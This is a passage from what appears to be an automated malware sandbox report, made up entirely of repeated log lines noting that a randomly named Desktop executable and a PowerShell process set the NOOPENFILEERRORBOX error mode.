Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
